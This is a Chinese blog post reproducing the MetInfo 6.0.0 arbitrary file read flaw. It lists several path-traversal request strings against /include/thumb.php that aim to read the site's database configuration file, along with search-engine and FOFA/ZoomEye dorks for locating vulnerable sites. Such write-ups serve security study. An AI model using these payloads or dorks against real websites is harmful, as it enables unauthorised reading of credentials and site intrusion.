metinfo __ 6.0.0 __ file-read

最新推荐文章于 2023-12-03 15:28:32 发布
最新推荐文章于 2023-12-03 15:28:32 发布
阅读量279 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cgjil/article/details/132774177
版权

metinfo __ 6.0.0 __ file-read

说明内容
漏洞编号
漏洞名称MetInfo 6.0.0 任意文件读取漏洞
漏洞评级高危
影响范围6.0.0.0
漏洞描述MetInfo 存在任意文件读取漏洞,攻击者利用该漏洞,
在具有权限的情况下,可以读取网站任意文件,包括配置文件等敏感文件。
修复方案打补丁
升级
上设备

1.漏洞描述

MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 ~ 6.1.0 版本中的 /app/system/include/module/old_thumb.class.php 文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。

2.漏洞等级

高危

3.影响版本

Metinfo 6.0.0

4.漏洞复现

4.1基础环境

在这里插入图片描述

4.2 漏洞实现

4.2.1注入点
/include/thumb.php

在这里插入图片描述

在这里插入图片描述

4.2.2第一次测试
/include/thumb.php?dir=..././http/..././config/config_db.php

在这里插入图片描述

4.2.3第二次测试
/include/thumb.php?dir=.....///http/.....///config/config_db.php

在这里插入图片描述

4.2.4第三次测试
/include/thumb.php?dir=http/.....///.....///config/config_db.php

在这里插入图片描述

4.2.5第四次测试
/include/thumb.php?dir=http\..\..\config\config_db.php

在这里插入图片描述

4.3 漏洞分析

5. 漏洞挖掘

5.1指纹信息

传统搜索引擎

Powered by MetInfo 6.0.0
intext:"Powered by MetInfo 6.0.0" inurl:"tw"

FOFA

app="metinfo"

ZoomEye

app:"MetInfo"
app:"MetInfo"+os:"Windows"

6. 漏洞修复

  • 打补丁
  • 升级
  • 上设备
cgjil
关注
专栏目录
metinfo_6.0.0 任意文件读取漏洞复现
薛定谔嘚喵博客
05-04 1030
MetInfo是一套使用PHP和Mysql开发的内容管理系统。MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
metinfo_5.0.4 任意文件本地包含漏洞复现(metinfo_5.0.4_lfi)
薛定谔嘚喵博客
05-06 650
include/module.php” 和 $mouble 这个变量,进行跟踪,打开 …/include/module.php,module.php里还包含着 “common.inc.php” ,我们先对module.php进行代码审计。可以看到当fmodule这个变量不等于7时,它就会对$module进行验证,接着对"common.inc.php"进行跟踪。发现common.inc.php的这段代码有漏洞点,双$$符号可能存在变量覆盖漏洞。我们要让fmodule=7,绕过对$module的验证。
metinfo全版本csrf漏洞(可导致重装)
u011066706的专栏
04-17 2011
漏洞文件/admin/app/batch/csvup.php 代码 <?php $depth='../'; require_once $depth.'../login/login_check.php'; setlocale(LC_ALL,array('zh_CN.gbk','zh_CN.gb2312','zh_CN.gb18030')); $codeold='gbk'; $codenew='u
metinfo6.0-任意文件读取
m0_58265086的博客
08-31 148
include.thumb.php //:include.thumb.php 是一个 PHP 文件,通常用于生成缩略图。该文件的主要功能是根据指定的参数生成并输出缩略图的图像数据。2.然后新建一个文件夹命名为1,在1文件夹下新建1.php文件。打开网页,右键审查元素,成功读取到phpinfo文件。从code新建php文件到www目录下。新建环境metino6.0环境。打开BP 输入 显示404。
MetInfo V6.0.0 版本发布公告
测试
05-04 262
软件版本:V 6.0.0 发布日期:2018-1-29 官方网站:https://www.metinfo.cn/ 交流平台:https://forum.metinfo.cn/ 下载地址:https://www.metinfo.cn/download/ 老版本升级必读:https://www.metinfo.cn/news/shownews1553.htm 新功能图文介绍:https...
MetInfo任意文件读取】--任意文件读取漏洞
m0_63241485的博客
08-29 3788
任意文件读取漏洞分析
java代码审计思维导图_代码审计-MetInfo 6.0.0 sql注入漏洞
weixin_35925956的博客
02-28 278
首先漏洞存在于app\system\message\web\message.class.php文件中,变量{$_M[form][id]}直接拼接在SQL语句中,且验证码检测函数是在SQL语句查询之后,这也就造成了我们可以无视验证码检测函数,进行SQL注入。具体问题函数代码如下:$met_fd_ok=DB::get_one("select * from {$_M[table][config]} wh...
MetInfo_php源码_
09-30
MetInfo PHP website system is a collection of "computer mobile site WeChat public" triad of company system
MetInfo_V7.2.0短信接口插件demo.zip
11-02
MetInfo_V7.2.0短信接口插件:企业网站高效通信的得力助手》 MetInfo是一款广泛应用于企业建站的开源CMS系统,其最新版本V7.2.0引入了一项重要的功能增强——短信接口插件。这个插件的出现,使得企业网站在与用户...
metinfo_手机生成静态页面.zip
04-29
Metinfo手机生成静态页面详解》 在当前的互联网环境中,网页加载速度和用户体验成为了衡量一个网站质量的重要标准。为了提升这些指标,许多网站管理员选择使用静态页面技术。Metinfo,作为一个功能强大的企业建站...
metinfo 6.0.0 任意文件读取漏洞复现
一个努力学习网安的小牛马
11-14 310
环境为mrtinfo 6.0.0。
【学习笔记】 MetInfo 6.0.0 任意文件读取漏洞
chualam的博客
11-02 870
readfile函数(xx) 控制xx里面的内容就可以实现任意读取
【漏洞复现】Metinfo6.0.0任意文件读取
过期的秋刀鱼
08-31 2356
dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将。漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的。文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。漏洞名称:MetInfo任意文件读取。影响版本:MetInfo 6.0.0。
metinfo 6.0 任意文件读取漏洞
浅笑996的博客
12-20 1998
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\metinfo),点击确定 漏洞分析 1.点击展开左侧app\system\include\module\目录,在弹出的下拉列表中双击old_thumb.class.ph...
米拓metinfo6.0,源码是否真的是原创
最新发布
itturang的博客
12-03 486
米拓metinfo6.0,源码是否真的是原创
metinfo_6.0.0_file-read 漏洞复现
QYbkx974的博客
11-14 72
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 版本中的 /app/system/include/module/old_thumb.class.php 文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
metinfo_6.0.0_file-read 任意文件读取漏洞复现
qq_45953122的博客
08-31 558
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 ~ 6.1.0 版本中的 /app/system/include/module/old_thumb.class.php 文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。
【漏洞复现】Metinfo6.0.0任意文件读取漏洞复现
过期的秋刀鱼
11-05 460
dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将。漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的。文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。漏洞名称:MetInfo任意文件读取。影响版本:MetInfo 6.0.0。
metinfo 6.0.0任意文件读取漏洞复现
SUPER131110的博客
09-01 350
设置了过滤条件,但是只设置了过滤"../"和“./”和请求头部是“http”开始,这样的过滤显然太简单了,我们可以用.\进行绕过构造payload。- 涉及的版本或软件(CMS版本、浏览器版本等)dir直接由_GET[‘dir’]传递进来。重现攻击过程所需的 payload。metinfo任意文件读取漏洞。简要解释漏洞产生的原因。打补丁,升级,上设备。
metinfo6.0.0文件上传
09-01
根据引用中提到的目录,在南方数据管理系统中存在文件...所以,metinfo文件上传漏洞可以通过南方数据管理系统的数据库备份功能来利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值